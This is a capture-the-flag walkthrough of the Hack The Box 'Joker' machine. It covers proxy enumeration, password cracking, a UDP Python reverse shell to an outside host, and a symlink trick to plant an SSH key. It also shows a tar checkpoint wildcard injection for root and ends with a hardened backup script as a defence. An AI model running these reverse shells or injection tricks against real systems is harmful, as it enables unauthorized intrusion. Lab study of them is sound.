JOKER — HTB walkthrough
Toughest of all the boxes so far. It took lots and lots of hints, and I learnt many things. I'm writing this walkthrough to share what I learned at the different points of the machine.
ENUMERATION
OpenSSH Enum
SQUID Proxy Enum
Nikto scan using proxy
It seems there is no attack surface. Let's think again and start the enumeration over.
A UDP Nmap scan revealed 2 ports open:
root@kali:~/Downloads/htb/Joker# nmap -sU -A 10.10.10.21
What do we require?
1) SSH keys to get in and gain a shell, or
2) SQUID authentication creds.
Googling the location of the SQUID files I see:
On our machine we have now got squid.conf.
It tells us that there is a password file at /etc/squid/passwords. Let's pull that file over TFTP too. It should contain the password for KALAMARI, the user the nikto scan showed us when it failed authentication.
Cracking the password: using john on /etc/squid/passwords.
Setting the browser to go through the squid proxy. For this we add a new proxy entry in FoxyProxy with the proxy details.
With this on we run our Nikto scan.
After a while I found I was doing this wrong: the host should be 127.0.0.1 and the proxy 10.10.10.21:3128, i.e. we scan the box's own loopback interface through its squid proxy.
Running again: nikto -h 127.0.0.1 -useproxy http://10.10.10.21:3128
Visiting 127.0.0.1 in the browser (with the joker proxy still on).
Nothing juicy here. Looking at the nikto scan results we see a directory named /console open. Visiting it we find an interactive console where we can run Python commands.
EXPLOITATION
Now we will use a Python reverse shell to connect back to us,
with a netcat listener on port 1234: root@kali:~# nc -lvp 1234
WOOOOOSSHHHHH !!!! It didn't work, and I kept losing the console again and again. After a lot of enumeration I found that the TCP connection was never coming back to us, and that we would need a UDP reverse shell instead.
Searching GitHub for a python pty shell, I found one for a UDP back-connect:
https://github.com/infodox/python-pty-shells/blob/master/udp_pty_backconnect.py. So we use the following command in the console.
>>> import subprocess; subprocess.Popen(["python", "-c", 'import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\"10.10.14.19\", 1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn(\"/bin/sh\");s.close()'])
This also won't come back on ncat over UDP, so we need a socat listener instead.
root@kali:~/Downloads/htb/Joker# socat file:`tty`,echo=0,raw udp-listen:1234
Checking our sudo privileges we see we are allowed to edit layout.html as alekos.
So we will try to make a directory and write our SSH public key into layout.html.
But here comes the problem: we cannot copy that file over to alekos' .ssh directory. So instead of copy-pasting, we will create a symlink to .ssh/authorized_keys.
What this does:
1) When we create a symlink from one path to another, every access to the link is redirected to the destination, so the destination's contents appear at the link.
Example
ln -s /mnt/external-drive ~/mydrive
In the example above a mounted external drive is symlinked into a home directory. This allows convenient browsing of the external drive from the home directory, because everything under /mnt/external-drive is now available under ~/mydrive.
2) So here we create layout.html as a symlink pointing at alekos' .ssh/authorized_keys. Whatever gets written to layout.html then lands in .ssh/authorized_keys, so when we write our id_rsa.pub there it ends up in alekos' authorized_keys, letting us SSH in as alekos without a password.
3) So remove the previously created layout.html and create the symlink first:
@joker:~/testing/n00bDI$ ln -s /home/alekos/.ssh/authorized_keys layout.html
Now we write our id_rsa.pub into layout.html in the folder we created through the wildcard in the sudo rule, the same way as before:
werkzeug@joker:~/testing/n00bDI$ sudoedit -u alekos /var/www/testing/n00bDI/layout.html
Nano commands:
Ctrl+V to paste the key; Ctrl+O to write the file; Enter to keep the file name and save as is.
After doing this we can SSH in as alekos from another terminal as follows:
PRIVILEGE ESCALATION
We find a folder, backup, containing backups of the development folder taken every five minutes.
All the tar files are owned by root and readable by alekos; they are backups of the development folder, taken every five minutes.
Now, what if we first move development aside, say to development.bak, and create development as a symlink to /root?
The backup job will still tell tar to archive the contents of development, but development now points at /root, so tar will read whatever is in /root instead of the real development folder. The resulting tar file will contain the contents of /root, which we can extract later to read root.txt.
1) Move development to development.bak and create the symlink:
We see the contents of /root showing up under development, which is enough to fool the tar command. After 5 minutes, when the backup is created and we extract it, we get root.txt, i.e. the contents of /root in the tar file.
For this, go to backup, create a folder named extract, move the latest tar file into it and extract it there.
Got root flag……
What about actually rooting the machine? We still aren't root.
1) There is a tar wildcard vulnerability we can use; see here:
https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
This requires the box to be reset. If you want to do it, proceed as follows.
In the development folder create these files:
alekos@joker:~/development$ touch -- --checkpoint=1
alekos@joker:~/development$ touch -- '--checkpoint-action=exec=python shell.py'
alekos@joker:~/development$ nano shell.py
In shell.py put our Python UDP reverse shell:
#!/usr/bin/python
import subprocess
subprocess.Popen(["python", "-c", 'import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\"10.10.14.19\", 1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn(\"/bin/sh\");s.close()'])
On your machine keep a socat listener on port 1234:
socat file:`tty`,echo=0,raw udp-listen:1234
Then wait 5 minutes for the backup to run. You get root.
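As an added example (not the box's real backup script, which this write-up never shows), here is a hardened stand-in for the five-minute backup job that closes both holes used above: the symlink swap of development and the wildcard/checkpoint file names. It assumes POSIX sh with tar on the PATH; safe_backup and list_backup are names chosen here.

```shell
#!/bin/sh
# Hardened stand-in for the five-minute backup job (added example, not the
# script running on the box). Two defences, matching the two tricks above:
#   1. the source is rejected if it is a symlink, so swapping
#      development -> /root makes the job abort instead of archiving /root;
#   2. tar is given "-C dir ." instead of a shell wildcard, so a file named
#      "--checkpoint-action=exec=..." is archived as data and never reaches
#      tar's option parser (symlinks inside the tree are stored as links,
#      since -h/--dereference is not used).
# Even so, a root job reading a user-controlled directory keeps a small
# check-then-use window; running it as a dedicated backup user removes
# what that window could expose.
safe_backup() {
    src=${1:?source directory}
    dest=${2:?archive path (absolute, outside the source)}
    # Symlink-swap defence: -L is true for a symlink even when it points at
    # a directory, so test it before -d.
    if [ -L "$src" ] || [ ! -d "$src" ]; then
        printf 'refusing to back up %s: symlink or not a directory\n' "$src" >&2
        return 1
    fi
    # Wildcard defence: no glob, so no attacker-chosen file name becomes an
    # argument; "." names the whole tree after -C changes into it.
    tar -cf "$dest" -C "$src" . || return 1
    return 0
}

# Lists the archive members so a reviewer can confirm the odd file names
# went in as plain entries.
list_backup() {
    tar -tf "$1"
}
```

Run safe_backup on a directory containing a file named --checkpoint=1 and it is listed as ./--checkpoint=1; point it at a symlink and it refuses and creates no archive.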